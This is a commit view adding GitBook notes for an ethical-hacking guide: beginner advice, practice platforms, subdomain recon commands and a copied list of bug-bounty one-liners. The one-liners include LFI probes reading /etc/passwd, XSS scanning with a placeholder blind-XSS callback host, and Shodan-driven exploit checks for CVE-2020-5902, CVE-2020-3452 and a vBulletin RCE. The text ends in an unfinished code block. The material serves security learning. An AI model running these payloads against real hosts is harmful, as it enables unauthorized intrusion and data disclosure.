crash.software
Projects
Pull Requests
Issues
Builds
Cipherops
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY Cipherops Commits 9693b23f
🤬
  • .gitbook/assets/image (1).png
  • .gitbook/assets/image (2).png
  • .gitbook/assets/image (3).png
  • .gitbook/assets/image (4).png
  • .gitbook/assets/image (5).png
  • .gitbook/assets/image (6).png
  • .gitbook/assets/image (7).png
  • .gitbook/assets/image (8).png
  • .gitbook/assets/image (9).png
  • .gitbook/assets/image.png
  • ■ ■ ■ ■ ■ ■
    README.md
    1  -<h1 align="center">Hi 👋, I'm Harshith ms</h1>
    2  -<h3 align="center">A passionate frontend developer, Ethical Hacker, Designer, Dancer from India</h3>
     1 +# 🌏 Journeying Through the World of Ethical Hacking with Cipher-ops
    3 2   
    4  -- 🌱 I’m currently learning **Python, solidity, ethereum**
     3 +{% hint style="info" %}
     4 +**GitBook tip:** your product docs aren't just a reference of all your features! use them to encourage folks to perform certain actions and discover the value in your product.
     5 +{% endhint %}
    5 6   
    6  -- 🤝 I’m looking for help with **web 3.0**
     7 +## <mark style="color:green;">Overview</mark>
    7 8   
    8  -- 💬 Ask me about **Web application security , OSINT , Network security**
     9 +#### <mark style="color:green;">Unveiling the Secrets of Vulnerabilities</mark>
     10 + 
     11 +> Embark on an educational journey that takes you through the fascinating world of ethical hacking. Our curated content covers a wide range of topics, including reconnaissance, vulnerability scanning, exploitation, and post-exploitation techniques. With each article, you'll gain
    9 12   
    10  -- 📫 How to reach me **[email protected]**
     13 +> Explore the intriguing realm of vulnerabilities and witness their inner workings unfold before your eyes. Our meticulously crafted bug bounty notes reveal the anatomy of various vulnerabilities, shedding light on their root causes and potential exploits. Gain a deep understanding of common vulnerabilities like XSS, SQL injection, and CSRF, as well as emerging threats and cutting-edge techniques.
    11 14   
    12  -<h3 align="left">Connect with me:</h3>
    13  -<p align="left">
    14  -</P>
    15 15   
  • ■ ■ ■ ■ ■ ■
    SUMMARY.md
     1 +# Table of contents
     2 + 
     3 +* [🌏 Journeying Through the World of Ethical Hacking with Cipher-ops](README.md)
     4 +* [Let's Start](lets-start/README.md)
     5 + * [🤩 Embarking on Your Hacking Journey: A Guide for Beginners](lets-start/embarking-on-your-hacking-journey-a-guide-for-beginners/README.md)
     6 + * [🥳 Exploring Top Platforms and Websites for Hacking Practice and Learning](lets-start/embarking-on-your-hacking-journey-a-guide-for-beginners/exploring-top-platforms-and-websites-for-hacking-practice-and-learning.md)
     7 + 
     8 +## Overview
     9 + 
     10 +* [ℹ Recon Tips](overview/recon-tips/README.md)
     11 + * [Best Recon Technique For Active Subdomain Enumeration](overview/recon-tips/best-recon-technique-for-active-subdomain-enumeration.md)
     12 + * [Mastering the Art of Information Gathering](overview/recon-tips/mastering-the-art-of-information-gathering.md)
     13 + * [One Liner from Awesome bug bounty](overview/recon-tips/one-liner-from-awesome-bug-bounty.md)
     14 + * [Resources](overview/recon-tips/resources/README.md)
     15 + * [Introducing 20 web-application hacking tools🔥🤩🌵](overview/recon-tips/resources/introducing-20-web-application-hacking-tools.md)
     16 + 
  • ■ ■ ■ ■ ■ ■
    lets-start/README.md
     1 +# Let's Start
     2 + 
     3 +[<mark style="color:red;">**A Guide to Getting Started in Hacking**</mark>](#user-content-fn-1)[^1]
     4 + 
     5 + 
     6 + 
     7 +**Step 1: Cultivate a Curious Mindset**
     8 + 
     9 +Curiosity is the driving force behind every successful hacker. Embrace your natural curiosity and thirst for knowledge as you delve into the world of cybersecurity. Ask questions, challenge assumptions, and develop a deep desire to understand how systems and technologies work.
     10 + 
     11 +### Step 2: Learn the Fundamentals
     12 + 
     13 +Building a strong foundation is crucial for any aspiring hacker. Start by familiarizing yourself with essential concepts such as networking, operating systems, programming languages, and web technologies. Online resources, tutorials, and interactive platforms provide valuable learning materials to help you grasp these fundamentals.
     14 + 
     15 +### Step 3: Practice with Capture The Flag (CTF) Challenges
     16 + 
     17 +Put your skills to the test by participating in Capture The Flag challenges. CTFs simulate real-world hacking scenarios and allow you to solve puzzles, exploit vulnerabilities, and think creatively to overcome obstacles. They provide an excellent opportunity to apply your knowledge in a practical and engaging environment.
     18 + 
     19 +### Step 4: Join a Hacking Community
     20 + 
     21 +Connect with fellow hackers through online communities, forums, and social media groups. Engaging with others who share your passion will expose you to diverse perspectives, valuable insights, and collaborative learning opportunities. Networking within the hacking community can open doors to new resources, mentorship, and growth.
     22 + 
     23 +### Step 5: Stay Updated with Latest Trends
     24 + 
     25 +The field of hacking is constantly evolving, with new techniques, vulnerabilities, and technologies emerging regularly. Stay up-to-date by following reputable cybersecurity blogs, attending conferences, and joining relevant mailing lists. Continuous learning is vital to keeping your skills sharp and adapting to the ever-changing landscape of cybersecurity.
     26 + 
     27 +### Step 6: Embrace Ethical Hacking Principles
     28 + 
     29 +Ethics and responsibility are fundamental in the world of hacking. As an ethical hacker, it's crucial to prioritize legality, integrity, and respect for others' privacy. Understand and adhere to ethical hacking guidelines and legal frameworks to ensure your actions contribute positively to the security community.
     30 + 
     31 +### Step 7: Never Stop Learning and Experimenting
     32 + 
     33 +Hacking is a journey of perpetual learning. Continuously challenge yourself, explore new areas of cybersecurity, and expand your skill set. Experiment with different tools, techniques, and methodologies to broaden your understanding and develop your unique approach to problem-solving.
     34 + 
     35 +Embarking on a hacking journey is an exhilarating experience filled with endless possibilities. Embrace the challenges, stay persistent, and never stop learning. Together, let's unlock the incredible world of hacking and make a difference in the realm of cybersecurity.
     36 + 
     37 +[^1]:
     38 + 
  • ■ ■ ■ ■ ■ ■
    lets-start/embarking-on-your-hacking-journey-a-guide-for-beginners/README.md
     1 +# 🤩 Embarking on Your Hacking Journey: A Guide for Beginners
     2 + 
     3 +<mark style="color:green;">**Join us on this captivating journey and become part of a vibrant community passionate about ethical hacking.**</mark> Together, let's explore the fascinating world of cybersecurity, unlock new possibilities, and elevate our skills to greater heights. Embrace the thrill of hacking, share knowledge, and connect with like-minded individuals who share your passion. Join us now and embark on this beautiful journey together!
     4 + 
     5 +FROM > CIPHER-OPS
     6 + 
  • ■ ■ ■ ■ ■ ■
    lets-start/embarking-on-your-hacking-journey-a-guide-for-beginners/exploring-top-platforms-and-websites-for-hacking-practice-and-learning.md
     1 +---
     2 +coverY: 0
     3 +layout:
     4 + cover:
     5 + visible: true
     6 + size: full
     7 + title:
     8 + visible: true
     9 + description:
     10 + visible: true
     11 + tableOfContents:
     12 + visible: true
     13 + outline:
     14 + visible: true
     15 + pagination:
     16 + visible: true
     17 +---
     18 + 
     19 +# 🥳 Exploring Top Platforms and Websites for Hacking Practice and Learning
     20 + 
     21 +## _<mark style="color:green;">**Learn by Doing**</mark>_
     22 + 
     23 +* [<mark style="color:green;">HackTheBox</mark>](exploring-top-platforms-and-websites-for-hacking-practice-and-learning.md#https-www.hackthissite.org-missions-basic) <mark style="color:green;">&</mark> [<mark style="color:green;">HackTheBox Academy</mark>](https://academy.hackthebox.eu/catalogue)<mark style="color:green;">:</mark> HackTheBox provides online machines to practice hacking and is considered one of the best platforms for learning through practical experience. If you're new to hacking, it is recommended to start by solving retired machines while following Ippsec videos. HackTheBox Academy is a new platform that offers guided learning, making it an excellent resource for practicing hacking and mastering specific technologies.
     24 +* [<mark style="color:green;">TryHackMe</mark>](https://tryhackme.com/)<mark style="color:green;">:</mark> TryHackMe offers virtual machines that can be solved through step-by-step walkthroughs, making it ideal for beginners. It provides a range of normal Capture The Flag (CTF) challenges where you can test your skills by hacking into the machines.
     25 +* [<mark style="color:green;">Rootme</mark>](https://www.root-me.org/)<mark style="color:green;">:</mark> Rootme is a platform that hosts virtual machines for hacking practice. It offers a variety of online machines to explore and exploit.
     26 +* [<mark style="color:green;">Vulnhub</mark>](https://www.vulnhub.com/)<mark style="color:green;">:</mark> Vulnhub provides downloadable virtual machines for hacking. You can download the machines and challenge yourself by finding vulnerabilities and exploiting them.
     27 +* [<mark style="color:green;">Hack.me</mark>](https://hack.me/)<mark style="color:green;">:</mark> Hack.me is a community platform that allows users to share and access hacking-related content, including challenges, tools, and resources.
     28 +* [<mark style="color:green;">Hacker101</mark>](https://www.hacker101.com/)<mark style="color:green;">:</mark> Hacker101 is a free website offering videos and Capture The Flag (CTF) challenges for learning hacking skills. It provides a comprehensive and practical approach to help you enhance your knowledge.
     29 +* [<mark style="color:green;">Crackmes.one</mark>](https://crackmes.one/)<mark style="color:green;">:</mark> Crackmes.one is a platform that focuses on forensic learning. It provides numerous binaries and challenges for practicing and improving your forensic skills.
     30 +* [<mark style="color:green;">HackThisSite</mark>](https://www.hackthissite.org/missions/basic/)<mark style="color:green;">:</mark> HackThisSite offers various missions and challenges to test and develop your hacking abilities. It covers a wide range of topics, from basic to advanced levels.
     31 +* [<mark style="color:green;">AttackDefense</mark>](https://attackdefense.com/)<mark style="color:green;">:</mark> AttackDefense offers hands-on, gamified, and interactive training environments for honing your offensive and defensive cybersecurity skills.
     32 +* [<mark style="color:green;">PortSwigger Web Security Academy</mark>](https://portswigger.net/web-security/dashboard)<mark style="color:green;">:</mark> PortSwigger Web Security Academy provides a collection of web exploitation labs and exercises to help you understand and strengthen your knowledge of web security.
     33 + 
     34 +These platforms and websites offer diverse opportunities for learning and practicing hacking skills, catering to beginners as well as more experienced individuals. Engage with these resources to enhance your understanding of cybersecurity and become proficient in ethical hacking.
     35 + 
     36 + 
  • ■ ■ ■ ■ ■ ■
    overview/recon-tips/README.md
     1 +# ℹ Recon Tips
     2 + 
     3 +<div data-full-width="false">
     4 + 
     5 +<figure><img src="../../.gitbook/assets/image (7).png" alt=""><figcaption><p>The Bug Hunter's Methodology v4.0 - Recon Edition Breakdown,thanks to<a href="https://t.me/jhaddix"> @jhaddix</a></p></figcaption></figure>
     6 + 
     7 +</div>
     8 + 
     9 +{% embed url="https://speakerdeck.com/harshbothra/offensive-recon-for-bug-bounty-hunters?slide=18" %}
     10 +Recon for Bug Bounty Hunters
     11 +{% endembed %}
     12 + 
     13 + 
  • ■ ■ ■ ■ ■ ■
    overview/recon-tips/best-recon-technique-for-active-subdomain-enumeration.md
     1 +# Best Recon Technique For Active Subdomain Enumeration
     2 + 
     3 +\
     4 +In this article, we will explore some effective reconnaissance techniques that can assist you in discovering valuable information. Let's dive into these techniques for a comprehensive recon experience.
     5 + 
     6 +<mark style="color:green;">**Technique 1:**</mark> Active Subdomain Enumeration Active subdomain enumeration is a powerful technique often overlooked in favor of passive methods. There are two ways to perform active subdomain enumeration:
     7 + 
     8 +1. <mark style="color:green;">Brute Forcing Subdomains Using Wordlist:</mark> By utilizing a DNS wordlist and tools like FFuF and Best DNS Wordlist, you can effectively brute force subdomains. Execute the following command:
     9 + 
     10 +```
     11 +Command: ffuf -u “https://FUZZ.target.com" -w <path_to_wordlist> -mc 200,301,302,403
     12 +```
     13 + 
     14 +<figure><img src="https://miro.medium.com/max/720/1*6dHXrt4y2JSwyUbn2UufIQ.png" alt="Active Subdomain Enumeration Using FFUF"><figcaption><p>Active Subdomain Enumeration Using FFUF</p></figcaption></figure>
     15 + 
     16 +<mark style="color:green;">Permutation Brute force</mark>: Create a new list of resolved subdomains by employing permutation, mutation, and alteration techniques with a wordlist. The tool altdns simplifies this process. Execute the following command:
     17 + 
     18 +```markup
     19 +Command: altdns -i hackerone.txt -o data_output -r -s final.txt -w words.txt
     20 +```
     21 + 
     22 +<figure><img src="../../.gitbook/assets/image (9).png" alt="Active Subdomain Enumeration Using FFUF"><figcaption><p>Active Subdomain Enumeration Using FFUF</p></figcaption></figure>
     23 + 
     24 +<mark style="color:green;">Technique 2:</mark> Favicon Hashes Favicons, the icons representing your website, possess unique hash values that can aid in discovering domains sharing the same hash function. Use the FavFreak tool to calculate favicon hashes. Execute the following command:
     25 + 
     26 +```
     27 +Command: cat urls.txt | python3 favfreak.py
     28 +```
     29 + 
     30 +<figure><img src="../../.gitbook/assets/image (5).png" alt="Favicon hash detecting using FavFreak"><figcaption><p>Favicon hash detecting using FavFreak</p></figcaption></figure>
     31 + 
     32 +Once the hash is calculated, you can use the same on internet search engines such as **shodan** to get the mass websites.
     33 + 
     34 +<figure><img src="https://miro.medium.com/max/720/1*WXdimyHXCrOkWW_YtDTDOQ.png" alt="Using shodan Search Engine to detect site that have same favicon hashed"><figcaption><p>Using shodan Search Engine to detect site that have same favicon hashed</p></figcaption></figure>
     35 + 
     36 +More About this Tool [here](https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139).
     37 + 
     38 +<mark style="color:green;">Technique 3</mark>: Nrich is an excellent command-line tool for analyzing IPs in a file for CVEs, open ports, and vulnerabilities. Note that Nrich only accepts IP addresses as input, not domain names. To find IP addresses of hostnames, use the dnsx tool. Execute the following command:
     39 + 
     40 +```
     41 +command: cat subdomains.txt | dnsx -a -resp-only | nrich -
     42 +```
     43 + 
     44 +<figure><img src="../../.gitbook/assets/image.png" alt="Using shodan Search Engine to detect site that have same favicon hashed"><figcaption><p>use a nrich tool to check out the subdomains </p></figcaption></figure>
     45 + 
     46 +<mark style="color:green;">Technique 4:</mark> Choosing the Right Target When dealing with applications that have numerous subdomains, selecting the right subdomain to start hunting can be challenging. Utilize the interesting subs gf pattern list to identify interesting subdomains worth investigating. Execute the following command:
     47 + 
     48 +```
     49 +cat subdoma.txt | gf interestingsubs
     50 +```
     51 + 
     52 +<figure><img src="https://miro.medium.com/max/720/1*TsN_DOGqFOX-CYv7G-Sbjw.png" alt="gf interestingsubs pattern list to find interesting subdomains"><figcaption><p>gf interestingsubs <strong>pattern list to find interesting subdomains</strong></p></figcaption></figure>
     53 + 
     54 +####
     55 + 
     56 +<figure><img src="https://miro.medium.com/max/720/1*Dz43T4JUM49M4vdpgSlCYw.png" alt="Performing whoislookup on target domain"><figcaption><p>Performing whoislookup on target domain</p></figcaption></figure>
     57 + 
     58 + 
     59 + 
     60 +<figure><img src="https://miro.medium.com/max/720/1*bVYAtg61mEC2Hg_oO1cevA.jpeg" alt="Searching For Tech Emails"><figcaption><p>Searching For Tech Emails</p></figcaption></figure>
     61 + 
     62 +<mark style="color:green;">Technique 5</mark>: Reverse Whoislookup Performing a WHOIS lookup on a target domain and checking for Tech Emails can provide WHOIS registration results. This information can be utilized to gather all assets associated with an organization. Follow these steps: A. Perform a WHOIS lookup on the target domain and check for Tech Emails. B. Visit drs.whoisxmlapi.com, sign up/login (500 free credits initially), and search with the Tech Email to discover all assets belonging to the target organization.
     63 + 
     64 +<mark style="color:green;">Technique 6</mark>: Uncover, a powerful tool developed by the Projectdisovery team, enables you to swiftly discover exposed hosts on the internet. It leverages Shodan, Censys, and Fofa for host discovery. To make the most of Uncover, create a dorks list and provide it as input. Execute the following command:
     65 + 
     66 +```
     67 +Command: cat dorks.txt | uncover
     68 +```
     69 + 
     70 +<figure><img src="../../.gitbook/assets/image (6).png" alt=""><figcaption><p>uncover tool link <a href="https://github.com/projectdiscovery/uncover">https://github.com/projectdiscovery/uncover</a></p></figcaption></figure>
     71 + 
     72 + 
     73 + 
     74 +: Finding Hidden Paths Using Meg Discovering hidden paths or directories is a crucial reconnaissance technique. Meg is a powerful tool that facilitates quick and efficient directory brute-forcing without overwhelming network traffic. Execute the following command:
     75 + 
     76 +```
     77 +Command: meg paths.txt hosts.txt output
     78 +```
     79 + 
     80 +<figure><img src="https://miro.medium.com/max/720/1*hQwOzRPoo7zWDYUWvO0aoQ.png" alt="File List Created for the host xyz.com with request and response"><figcaption><p>File List Created for the host xyz.com with request and response</p></figcaption></figure>
     81 + 
     82 +<mark style="color:green;">Technique 8</mark>: Finding Open Ports and Services Identifying open ports and services running on them is essential for web application assessment. Naabu is a fast port scanner that simplifies the process and even allows running Nmap scans. Execute the following command:
     83 + 
     84 +```
     85 +Command: naabu -host target.com
     86 +```
     87 + 
     88 +<figure><img src="../../.gitbook/assets/image (4).png" alt=""><figcaption><p>Finding open ports and service running using naabu</p></figcaption></figure>
     89 + 
     90 +:clap:Thank you for taking the time to explore these amazing reconnaissance techniques. :smile:We hope you found this blog informative and useful in your endeavors.
     91 + 
  • ■ ■ ■ ■ ■ ■
    overview/recon-tips/mastering-the-art-of-information-gathering.md
     1 +---
     2 +description: 'NOTE: This is just a information, for further reading do check the article'
     3 +---
     4 + 
     5 +# Mastering the Art of Information Gathering
     6 + 
     7 +### Introduction
     8 + 
     9 +* Article source: [Recon Everything](https://infosecwriteups.com/recon-everything-48aafbb8987)
     10 +* Key focus: Comprehensive notes on mastering the art of information gathering through reconnaissance techniques.
     11 + 
     12 +### Table of Contents:
     13 + 
     14 +1. What is Reconnaissance?
     15 +2. Passive Reconnaissance Techniques
     16 + * WHOIS Lookup
     17 + * Google Dorking
     18 + * OSINT (Open-Source Intelligence)
     19 +3. Active Reconnaissance Techniques
     20 + * Port Scanning
     21 + * Banner Grabbing
     22 + * DNS Enumeration
     23 +4. Web Reconnaissance Techniques
     24 + * Website Crawling
     25 + * Subdomain Enumeration
     26 + * Web Application Fingerprinting
     27 +5. Network Reconnaissance Techniques
     28 + * Network Scanning
     29 + * ARP Scanning
     30 + * SNMP Enumeration
     31 +6. Social Engineering Reconnaissance Techniques
     32 + * Social Media Profiling
     33 + * Phishing
     34 + * Dumpster Diving
     35 +7. Tools and Resources for Reconnaissance
     36 + * Nmap
     37 + * theHarvester
     38 + * Shodan
     39 + * Recon-ng
     40 + * Maltego
     41 + * SpiderFoot
     42 +8. Reconnaissance Best Practices
     43 + * Legal and Ethical Considerations
     44 + * Information Gathering Methodology
     45 + * Documentation and Reporting
     46 +9. Conclusion
     47 + 
     48 +### Summary and Key Takeaways:
     49 + 
     50 +* Reconnaissance is the process of gathering information to gain insight into a target system or organization.
     51 +* Passive techniques involve collecting publicly available data without directly interacting with the target.
     52 +* Active techniques involve direct interaction and probing of the target system.
     53 +* Web reconnaissance focuses on gathering information about websites, subdomains, and web applications.
     54 +* Network reconnaissance aims to discover hosts, open ports, and network vulnerabilities.
     55 +* Social engineering reconnaissance involves collecting information through social manipulation techniques.
     56 +* Various tools and resources are available to streamline the reconnaissance process.
     57 +* Adhering to legal and ethical guidelines is crucial during reconnaissance activities.
     58 +* A structured methodology and proper documentation enhance the effectiveness of reconnaissance efforts.
     59 + 
     60 +### Conclusion
     61 + 
     62 +Reconnaissance serves as the foundation for successful information gathering in the field of cybersecurity. By understanding the various techniques and tools available, security professionals can gain valuable insights into their targets. However, it is essential to remember the importance of legal and ethical considerations when conducting reconnaissance activities. With a comprehensive approach and proper documentation, the art of reconnaissance can be mastered, leading to more effective cybersecurity strategies.
     63 + 
     64 +Note: This article was created based on the content from [Recon Everything](https://infosecwriteups.com/recon-everything-48aafbb8987) as a reference source.
     65 + 
  • ■ ■ ■ ■ ■ ■
    overview/recon-tips/one-liner-from-awesome-bug-bounty.md
     1 +# One Liner from Awesome bug bounty
     2 + 
     3 +## Awesome One-liner Bug Bounty [![Awesome](https://awesome.re/badge-flat2.svg)](https://github.com/dwisiswant0/awesome-oneliner-bugbounty/tree/master) <a href="#https-github.com-dwisiswant0-awesome-oneliner-bugbounty-tree-master" id="https-github.com-dwisiswant0-awesome-oneliner-bugbounty-tree-master"></a>
     4 + 
     5 +> A collection of awesome one-liner scripts especially for bug bounty.
     6 + 
     7 +This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily♥ welcome.
     8 + 
     9 +### Definitions
     10 + 
     11 +This section defines specific terms or placeholders that are used throughout one-line command/scripts.
     12 + 
     13 +* 1.1. "**HOST**" defines one hostname, (sub)domain, or IP address, e.g. replaced by `internal.host`, `domain.tld`, `sub.domain.tld`, or `127.0.0.1`.
     14 +* 1.2. "**HOSTS.txt**" contains criteria 1.1 with more than one in file.
     15 +* 2.1. "**URL**" definitely defines the URL, e.g. replaced by `http://domain.tld/path/page.html` or somewhat starting with HTTP/HTTPS protocol.
     16 +* 2.2. "**URLS.txt**" contains criteria 2.1 with more than one in file.
     17 +* 3.1. "**FILE.txt**" or "**FILE**`{N}`**.txt**" means the files needed to run the command/script according to its context and needs.
     18 +* 4.1. "**OUT.txt**" or "**OUT**`{N}`**.txt**" means the file as the target storage result will be the command that is executed.
     19 + 
     20 +#### Local File Inclusion
     21 + 
     22 +> @dwisiswant0
     23 + 
     24 +```bash
     25 +gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
     26 +```
     27 + 
     28 +#### Open-redirect
     29 + 
     30 +> @dwisiswant0
     31 + 
     32 +```bash
     33 +export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
     34 +```
     35 + 
     36 +> @N3T\_hunt3r
     37 + 
     38 +```bash
     39 +cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
     40 +```
     41 + 
     42 +#### XSS
     43 + 
     44 +> @cihanmehmet
     45 + 
     46 +```bash
     47 +gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
     48 +```
     49 + 
     50 +> @fanimalikhack
     51 + 
     52 +```bash
     53 +waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
     54 +```
     55 + 
     56 +> @oliverrickfors
     57 + 
     58 +```bash
     59 +cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
     60 +```
     61 + 
     62 +#### Prototype Pollution
     63 + 
     64 +> @R0X4R
     65 + 
     66 +```bash
     67 +subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"
     68 +```
     69 + 
     70 +#### CVE-2020-5902
     71 + 
     72 +> @Madrobot\_
     73 + 
     74 +```bash
     75 +shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
     76 +```
     77 + 
     78 +#### CVE-2020-3452
     79 + 
     80 +> @vict0ni
     81 + 
     82 +```bash
     83 +while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt
     84 +```
     85 + 
     86 +#### CVE-2022-0378
     87 + 
     88 +> @7h3h4ckv157
     89 + 
     90 +```bash
     91 +cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done
     92 +```
     93 + 
     94 +#### vBulletin 5.6.2 - 'widget\_tabbedContainer\_tab\_panel' Remote Code Execution
     95 + 
     96 +> @Madrobot\_
     97 + 
     98 +```bash
     99 +shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
     100 +```
     101 + 
     102 +#### Find JavaScript Files
     103 + 
     104 +> @D0cK3rG33k
     105 + 
     106 +```bash
     107 +assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" | sed -e 's, 'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars"; done
     108 +```
     109 + 
     110 +#### Extract Endpoints from JavaScript
     111 + 
     112 +> @renniepak
     113 + 
     114 +```bash
     115 +cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u
     116 +```
     117 + 
     118 +#### Get CIDR & Org Information from Target Lists
     119 + 
     120 +> @steve\_mcilwain
     121 + 
     122 +```bash
     123 +for HOST in $(cat HOSTS.txt);do echo $(for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; d
     124 +one | uniq); done
     125 +```
     126 + 
     127 +#### Get Subdomains from RapidDNS.io
     128 + 
     129 +> @andirrahmani1
     130 + 
     131 +```bash
     132 +curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u
     133 +```
     134 + 
     135 +#### Get Subdomains from BufferOver.run
     136 + 
     137 +> @\_ayoubfathi\_
     138 + 
     139 +```bash
     140 +curl -s https://dns.bufferover.run/dns?q=.HOST.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u
     141 +```
     142 + 
     143 +> @AnubhavSingh\_
     144 + 
     145 +```bash
     146 +export domain="HOST"; curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"
     147 +```
     148 + 
     149 +#### Get Subdomains from Riddler.io
     150 + 
     151 +> @pikpikcu
     152 + 
     153 +```bash
     154 +curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
     155 +```
     156 + 
     157 +#### Get Subdomains from VirusTotal
     158 + 
     159 +> @pikpikcu
     160 + 
     161 +```bash
     162 +curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
     163 +```
     164 + 
     165 +#### Get Subdomain with cyberxplore
     166 + 
     167 +> @pikpikcu
     168 + 
     169 +```
     170 +curl https://subbuster.cyberxplore.com/api/find?domain=HOST -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+"
     171 +```
     172 + 
     173 +#### Get Subdomains from CertSpotter
     174 + 
     175 +> @caryhooper
     176 + 
     177 +```bash
     178 +curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
     179 +```
     180 + 
     181 +#### Get Subdomains from Archive
     182 + 
     183 +> @pikpikcu
     184 + 
     185 +```bash
     186 +curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u
     187 +```
     188 + 
     189 +#### Get Subdomains from JLDC
     190 + 
     191 +> @pikpikcu
     192 + 
     193 +```bash
     194 +curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
     195 +```
     196 + 
     197 +#### Get Subdomains from securitytrails
     198 + 
     199 +> @pikpikcu
     200 + 
     201 +```bash
     202 +curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u
     203 +```
     204 + 
     205 +#### Bruteforcing Subdomain using DNS Over
     206 + 
     207 +> @pikpikcu
     208 + 
     209 +```
     210 +while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt
     211 +```
     212 + 
     213 +#### Get Subdomains With sonar.omnisint.io
     214 + 
     215 +> @pikpikcu
     216 + 
     217 +```
     218 +curl --silent https://sonar.omnisint.io/subdomains/HOST | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u
     219 +```
     220 + 
     221 +#### Get Subdomains With synapsint.com
     222 + 
     223 +> @pikpikcu
     224 + 
     225 +```
     226 +curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2FHOST" | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u
     227 +```
     228 + 
     229 +#### Get Subdomains from crt.sh
     230 + 
     231 +> @vict0ni
     232 + 
     233 +```bash
     234 +curl -s "https://crt.sh/?q=%25.HOST&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
     235 +```
     236 + 
     237 +#### Sort & Tested Domains from Recon.dev
     238 + 
     239 +> @stokfedrik
     240 + 
     241 +```bash
